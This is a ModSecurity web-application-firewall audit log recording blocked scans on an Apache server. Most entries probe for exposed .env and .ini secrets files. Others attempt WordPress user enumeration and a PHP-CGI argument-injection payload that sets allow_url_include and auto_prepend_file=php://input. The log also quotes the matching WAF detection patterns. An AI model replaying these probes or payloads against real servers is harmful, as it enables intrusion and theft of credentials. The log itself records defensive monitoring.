Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71d5fe23-Z-- --d0327055-A-- [15/Apr/2025:08:51:36 +0700] Z_27qCULYKh39tLgM0CFzQAAAEE 103.236.140.4 41558 103.236.140.4 8181 --d0327055-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d0327055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0327055-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896420024 844 (- - -) Stopwatch2: 1744681896420024 844; combined=337, p1=299, p2=0, p3=0, p4=0, p5=38, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0327055-Z-- --b2cb8d29-A-- [15/Apr/2025:08:51:36 +0700] Z_27qCULYKh39tLgM0CFzgAAAEI 103.236.140.4 41560 103.236.140.4 8181 --b2cb8d29-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --b2cb8d29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2cb8d29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896601907 738 (- - -) Stopwatch2: 1744681896601907 738; combined=290, p1=254, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2cb8d29-Z-- --c3eb047f-A-- [15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vjwAAAMI 103.236.140.4 41562 103.236.140.4 8181 --c3eb047f-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c3eb047f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3eb047f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896769833 672 (- - -) Stopwatch2: 1744681896769833 672; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3eb047f-Z-- --89f54c63-A-- [15/Apr/2025:08:51:36 +0700] Z_27qM1f8LoF-Pq3UL777gAAAIo 103.236.140.4 41564 103.236.140.4 8181 --89f54c63-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --89f54c63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89f54c63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896771645 654 (- - -) Stopwatch2: 1744681896771645 654; combined=253, p1=220, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89f54c63-Z-- --915c793a-A-- [15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vkAAAAMA 103.236.140.4 41566 103.236.140.4 8181 --915c793a-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --915c793a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --915c793a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896937504 621 (- - -) Stopwatch2: 1744681896937504 621; combined=253, p1=222, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --915c793a-Z-- --9e30d912-A-- [15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vkQAAAME 103.236.140.4 41568 103.236.140.4 8181 --9e30d912-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9e30d912-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e30d912-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896940680 605 (- - -) Stopwatch2: 1744681896940680 605; combined=244, p1=213, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e30d912-Z-- --573ad162-A-- [15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CFzwAAAEQ 103.236.140.4 41570 103.236.140.4 8181 --573ad162-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --573ad162-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --573ad162-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897105181 639 (- - -) Stopwatch2: 1744681897105181 639; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --573ad162-Z-- --8ed68556-A-- [15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CF0AAAAEU 103.236.140.4 41572 103.236.140.4 8181 --8ed68556-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8ed68556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed68556-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897121626 617 (- - -) Stopwatch2: 1744681897121626 617; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed68556-Z-- --9e509229-A-- [15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CF0gAAAEo 103.236.140.4 41576 103.236.140.4 8181 --9e509229-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9e509229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e509229-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897290569 642 (- - -) Stopwatch2: 1744681897290569 642; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e509229-Z-- --ecd74957-A-- [15/Apr/2025:08:51:37 +0700] Z_27qaXLWI2MDahumW9vkwAAAMU 103.236.140.4 41580 103.236.140.4 8181 --ecd74957-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ecd74957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecd74957-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897459824 761 (- - -) Stopwatch2: 1744681897459824 761; combined=326, p1=292, p2=0, p3=0, p4=0, p5=34, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecd74957-Z-- --6242ae32-A-- [15/Apr/2025:08:51:38 +0700] Z_27qqXLWI2MDahumW9vmwAAANM 103.236.140.4 41596 103.236.140.4 8181 --6242ae32-B-- GET /db.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6242ae32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6242ae32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744681898548441 1679 (- - -) Stopwatch2: 1744681898548441 1679; combined=619, p1=301, p2=292, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6242ae32-Z-- --2a86644c-A-- [15/Apr/2025:15:28:42 +0700] Z_4YuqXLWI2MDahumW964gAAAM8 103.236.140.4 35904 103.236.140.4 8181 --2a86644c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 174.138.30.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 174.138.30.61 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: */* --2a86644c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a86644c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744705722542946 3130 (- - -) Stopwatch2: 1744705722542946 3130; combined=1398, p1=444, p2=926, p3=0, p4=0, p5=28, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a86644c-Z-- --4a9d172a-A-- [15/Apr/2025:16:33:52 +0700] Z_4oAM1f8LoF-Pq3UL4Q1AAAAIo 103.236.140.4 36318 103.236.140.4 8181 --4a9d172a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4a9d172a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a9d172a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744709632189923 909 (- - -) Stopwatch2: 1744709632189923 909; combined=391, p1=343, p2=0, p3=0, p4=0, p5=48, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a9d172a-Z-- --5768df07-A-- [15/Apr/2025:16:33:54 +0700] Z_4oAs1f8LoF-Pq3UL4Q1gAAAIs 103.236.140.4 36322 103.236.140.4 8181 --5768df07-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5768df07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5768df07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744709634275383 671 (- - -) Stopwatch2: 1744709634275383 671; combined=270, p1=236, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5768df07-Z-- --c37e406e-A-- [15/Apr/2025:16:46:04 +0700] Z_4q3M1f8LoF-Pq3UL4Q3gAAAIU 103.236.140.4 36394 103.236.140.4 8181 --c37e406e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.4.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.4.146 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c37e406e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c37e406e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744710364602221 868 (- - -) Stopwatch2: 1744710364602221 868; combined=354, p1=314, p2=0, p3=0, p4=0, p5=40, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c37e406e-Z-- --3a15707f-A-- [15/Apr/2025:17:33:27 +0700] Z_4198-f7AifS1fst96B1wAAAAM 103.236.140.4 40492 103.236.140.4 8181 --3a15707f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 130.61.224.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 130.61.224.219 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --3a15707f-C-- --3a15707f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a15707f-E-- --3a15707f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744713207052228 4763 (- - -) Stopwatch2: 1744713207052228 4763; combined=3146, p1=470, p2=2645, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a15707f-Z-- --3ada0e01-A-- [15/Apr/2025:18:31:40 +0700] Z_5DnCULYKh39tLgM0CSfQAAAFI 103.236.140.4 40850 103.236.140.4 8181 --3ada0e01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --3ada0e01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ada0e01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744716700658483 791 (- - -) Stopwatch2: 1744716700658483 791; combined=329, p1=287, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ada0e01-Z-- --97d65c4a-A-- [15/Apr/2025:18:32:10 +0700] Z_5Dus1f8LoF-Pq3UL4TqwAAAIQ 103.236.140.4 40852 103.236.140.4 8181 --97d65c4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 Accept-Charset: utf-8 --97d65c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97d65c4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744716730525632 723 (- - -) Stopwatch2: 1744716730525632 723; combined=306, p1=267, p2=0, p3=0, p4=0, p5=39, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97d65c4a-Z-- --6a09470f-A-- [15/Apr/2025:20:02:03 +0700] Z_5Yy6XLWI2MDahumW9-qQAAANI 103.236.140.4 42102 103.236.140.4 8181 --6a09470f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --6a09470f-C-- --6a09470f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a09470f-E-- --6a09470f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
